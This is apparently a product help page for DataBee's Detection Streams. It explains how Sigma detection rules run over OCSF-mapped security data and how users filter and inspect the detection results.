- Print
- DarkLight
What are Detection Streams in DataBee?
Active detection streams apply Sigma formatted rules, an open-source signature format, over security data that is mapped to a DataBee-extended version of OCSF to integrate into the existing security ecosystem with minimal customizations. DataBee handles the translation from the Sigma taxonomy to OCSF to help lower the level of effort needed to adopt and support organizations on their journey to vendor-agnostic security operations. With Sigma-formatted detections leveraging OCSF in DataBee, organizations can swap out security vendors without needing to update log parsers or security detection content.
Sigma rules provide a standardized syntax for defining detection logic, enabling security professionals to comprehensively define parameters for identifying potential security incidents. These rules encapsulate a wide range of threat indicators, from known attack patterns to emerging risks, empowering organizations to identify suspicious behaviors effectively. As an open-source language, Sigma rules are easily and freely shared among cybersecurity operators. The primary aim of Sigma rules is to streamline and enhance the process of threat detection and incident response. By offering a common language for threat detection, Sigma rules bridge the gap between disparate security technologies.
To delve deeper into sigma rules, visit their official GitHub repo: sigma rules
Within DataBee, you can empower your security monitoring by crafting custom Sigma rules or linking to existing Sigma rule Git repositories. Discover a multitude of available Sigma rule Git repositories, some of which are highlighted below for your convenience:
View Detection Streams
Click the Detection Streams button to view a comprehensive table showing all the results matching the configured Sigma rulesets. By default, it will filter the view to the Sigma formatted Detections
To explore all available detections, DataBee platform offers Smart Filters. For instance, you can enhance search precision by clicking the 'Title' dropdown button to incorporate keywords under the 'Contains' option, or choose the relevant titles to be included in the results. Utilize the 'In' or 'Not In' options from the parameter dropdown lists for a more targeted output. Select the desired security level (Informational, Low, Medium, High, Critical) to filter results accordingly. Choose specific status tags to streamline your search. Specify the time of the event using options like last hour, day, week, or month. For more flexibility, set a custom range interval for when the events have occurred. You can add additional filter parameters by selecting form the Add Parameters drop-down list.
Click on Apply to activate the selected filters.
Upon applying these filters, a table will be generated, displaying vital information. To access detailed information about a specific output, click on the search icon under the 'Details' column. A "Rules Details" page will pop up, showcasing the full rule text with YAML highlighting. Customize the number of results per page using the pagination dropdown button.